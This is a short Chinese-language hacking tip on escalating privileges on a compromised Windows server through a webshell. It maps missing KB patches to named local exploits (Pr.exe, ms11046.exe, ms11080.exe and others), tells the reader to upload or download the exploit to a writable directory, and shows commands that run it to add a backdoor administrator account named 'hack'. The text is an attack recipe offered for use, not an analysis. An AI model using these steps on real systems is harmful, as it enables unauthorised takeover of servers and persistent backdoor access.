1、 查看系统打补丁情况:systeminfo
2、 查看KB-EXP表:
KB2360937 MS10-084
KB2478960 MS11-014
KB2507938 MS11-056
KB2566454 MS11-062
KB2646524 MS12-003
KB2645640 MS12-009
KB2641653 MS12-018
KB952004 MS09-012 Pr.exe
KB956572 MS09-012 巴西烤肉
KB971657 MS09-041
KB2620712 MS11-097
KB2393802 MS11-011 ms11011.exe
KB942831 MS08-005
KB2503665 MS11-046 ms11046.exe
KB2592799 MS11-080 ms11080.exe
这个表以后会不断更新!
3、 webshell中查找可读可写可执行的目录,然后上传我们的EXP
如果不能上传,则通过下载EXP解决
4、 webshell中执行我们的EXP
比如:
pr.exe “whoami”
执行结果:
administrator
pr.exe “net user hack 1234 /add & net localgroup administrators hack /add”
其他的EXP一个道理~
EXP可以参考一下暗月的~